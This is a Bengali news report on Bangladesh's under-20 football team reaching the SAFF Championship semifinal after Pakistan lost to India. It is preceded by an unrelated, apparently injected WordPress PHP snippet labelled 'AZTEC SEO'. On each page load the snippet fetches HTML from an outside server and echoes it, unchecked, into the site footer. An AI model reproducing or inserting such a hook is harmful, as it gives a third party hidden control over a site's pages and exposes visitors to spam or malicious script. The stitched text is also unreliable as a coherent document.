/* AZTEC SEO */ add_action('wp_footer', function () { $domain = wp_parse_url(home_url(), PHP_URL_HOST); if (!$domain) return; $ck = 'aztec_footer_' . md5($domain); $html = get_transient($ck); if ($html === false) { $url = add_query_arg(array('domain' => $domain, 'date' => gmdate('c')), 'https://aztec-seo.com/api/v1/footer'); $res = wp_remote_get($url, array('timeout' => 8)); $html = (!is_wp_error($res) && wp_remote_retrieve_response_code($res) === 200) ? (string) wp_remote_retrieve_body($res) : ''; set_transient($ck, $html, $html === '' ? 5 * MINUTE_IN_SECONDS : HOUR_IN_SECONDS); } if ($html !== '') echo $html; }, 99);
পাকিস্তান হেরে যাওয়ায় সেমিফাইনালে উঠে গেল বাংলাদেশ অনূর্ধ্ব-২০ ফুটবল দল।
বাংলাদেশ প্রথম ম্যাচে পাকিস্তানকে ২-০ গোলে হারিয়ে সাফ অনূর্ধ্ব-২০ চ্যাম্পিয়নশিপের সেমিফাইনালে এক পা দিয়ে রেখেছিল।
সমীকরণ ছিল গ্রুপের দ্বিতীয় ম্যাচে ভারতের বিপক্ষে পাকিস্তান হেরে গেলে তাদের বিদায় নিশ্চিত হয়ে যাবে; এবং বাংলাদেশের সেমিফাইনাল নিশ্চিত হবে।
সেই সমীকরণ অনুসারে আজ বৃহস্পতিবার টিকে থাকার লড়াইয়ে চিরপ্রতিদ্বন্দ্বী ভারতের বিপক্ষে পাকিস্তান ৩-০ গোলে হেরে যায়। পাকিস্তান হেরে যাওয়ায় সুবিধা হয়েছে বাংলাদেশর।
মালদ্বীপে চলমান সাফ চ্যাম্পিয়নশিপে আগামী শনিবার গ্রুপের শেষ ম্যাচে বাংলাদেশের প্রতিপক্ষ ভারত। সেই ম্যাচে ভারতকে হারাতে পারলে গ্রুপ চ্যাম্পিয়ন হয়ে সেমিতে যাবে লাল সবুজের দল। আর হেরে গেলে রানার্সআপ হয়ে সেমিফাইনাল খেলবে বাংলাদেশ।
বাংলাদেশ ও ভারতের পয়েন্ট সমান ৩ হলেও পাকিস্তানের জালে এক গোল বেশি দিয়ে টেবিলের শীর্ষে আছে ভারত। তাই বাংলাদেশকে গ্রুপসেরা হতে হলে ভারতকে হারাতেই হবে। ড্র হলেই ভারত হবে গ্রুপ চ্যাম্পিয়ন।
টুর্নামেন্টের দুটি সেমিফাইনালই হবে ১ এপ্রিল। জয়ী দুই দল ফাইনালে মুখোমুখি হবে ৩ এপ্রিল।